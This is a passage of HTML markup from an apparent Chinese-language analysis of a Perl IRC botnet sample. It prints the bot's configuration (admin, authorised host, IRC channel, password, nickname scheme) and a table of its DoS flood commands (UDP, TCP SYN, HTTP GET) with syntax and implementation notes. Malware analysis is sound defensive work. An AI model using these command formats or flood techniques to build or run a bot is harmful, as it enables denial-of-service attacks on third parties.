style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#34;12345&#34;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">);  </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 管理员</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">my</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">@hostauth</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> (</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#34;qwerty&#34;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">);                 </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 授权主机</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">my</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">@canais</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> (</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#34;<a class="wx_topic_link" topic-id="mp2iifby-mg3to9" style="color: #576B95 !important;" data-topic="1" data-recommend="">#ssh</a>&#34;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">);                   </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># IRC 频道</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,255);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">my</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">$chanpass</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#34;@&#34;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">;                        </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 频道密码</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 机器人命名格式</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">$nick</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#34;L_${CPU_CORES}_${HOSTNAME}&#34;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">; </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">$ircname</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#34;linux_${CPU_CORES}&#34;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">;           </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># IRC 用户名</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">$realname</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#34;${HOSTNAME} ${CPU_CORES}&#34;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">;     </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 真实名</span></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);word-break: break-all;box-sizing: border-box;"><span textstyle="" style="font-weight: bold;">D</span></span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);word-break: break-all;box-sizing: border-box;"><span textstyle="" style="font-weight: bold;">DoS 攻击命令</span></span></p><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="135" width="135" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium;border-style: solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">命令</span></font></span></b></p></td><td data-colwidth="184" width="184" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">格式</span></font></span></b></p></td><td data-colwidth="105" width="105" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">协议</span></font></span></b></p></td><td data-colwidth="426" width="426" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">实现</span></font></span></b></p></td></tr><tr><td data-colwidth="135" width="135" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">udpflood</span></span></p></td><td data-colwidth="184" width="184" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u udpflood &lt;host&gt; &lt;pkt_size&gt; &lt;time&gt;</span></span></p></td><td data-colwidth="105" width="105" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">UDP Raw</span></span></p></td><td data-colwidth="426" width="426" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">socket(SOCK1, PF_INET, SOCK_RAW, 2)</span></span><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">+ SOCK_DGRAM</span></span></p></td></tr><tr><td data-colwidth="135" width="135" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">udp</span></span></p></td><td data-colwidth="184" width="184" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u udp &lt;host&gt; &lt;port&gt; &lt;pkt_size&gt; &lt;time&gt;</span></span></p></td><td data-colwidth="105" width="105" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">UDP</span></span></p></td><td data-colwidth="426" width="426" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">inet_aton</span></span><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">+ </span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">send()</span></span></p></td></tr><tr><td data-colwidth="135" width="135" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">tcpflood</span></span></p></td><td data-colwidth="184" width="184" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u tcpflood &lt;host&gt; &lt;port&gt; &lt;pkt_size&gt; &lt;time&gt;</span></span></p></td><td data-colwidth="105" width="105" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">TCP SYN</span></span></p></td><td data-colwidth="426" width="426" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">1000并发 </span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">socket()+connect()+shutdown()</span></span></p></td></tr><tr><td data-colwidth="135" width="135" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">httpflood</span></span></p></td><td data-colwidth="184" width="184" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u httpflood &lt;host&gt; &lt;time&gt;</span></span></p></td><td data-colwidth="105" width="105" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">HTTP GET</span></span></p></td><td data-colwidth="426" width="426" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">IO::Socket::INET-&gt;new(PeerPort=&gt;80)</span></span><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">循环</span></font><span leaf=""> GET</span></span></p></td></tr><tr><td data-colwidth="135" width="135" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p 